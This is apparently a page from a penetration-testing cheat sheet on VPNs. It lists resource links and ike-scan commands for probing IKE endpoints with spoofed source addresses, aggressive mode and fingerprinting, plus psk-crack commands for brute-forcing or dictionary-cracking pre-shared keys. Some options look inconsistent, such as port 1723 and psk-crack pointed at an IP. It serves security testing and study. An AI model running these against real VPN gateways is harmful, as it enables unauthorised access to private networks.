🟨VPNs

Resources

GitHub - 0x90/vpn-arsenal: VPN pentest tools and scriptsGitHub

IPsec VPN Penetration Testing with BackTrack Tools - Open Source For YouOpen Source For You

Solution du CTF HackLAB : VulnVPN - Nicolas SURRIBAS

Learning how to pentest VPNs with VulnVPN - Infosec ResourcesInfosec Resources

Hack The Box - Conceal0xRick's Blog

Techniques

IKEv2 Authenthication IP spoofing

ike-scan --sport=1723 --dport=1723 --sourceip=IP_To_Spoof --ikev2 <IP>

Trying all authentication modes

ike-scan --dport=1723 --auth=1 <IP>
ike-scan --dport=1723 --auth=3 <IP>
ike-scan --dport=1723 --auth=64221 <IP>

IP spoofing using ike-scan

ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=1 <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=3 <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=64221 <IP>

IP spoofing and agressive mode

ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=1 <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=3 <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=64221 <IP>

Show fingerprint

ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=1 --showbackoff <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=3 --showbackoff <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=64221 --showbackoff <IP>

Crack the key using psk-crack

psk-crack hash-file.txt
psk-crack -b 5 IP
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" <IP>
psk-crack -d wordlist.txt <IP>

PreviousRlogin NextEcho

Last updated 1 year ago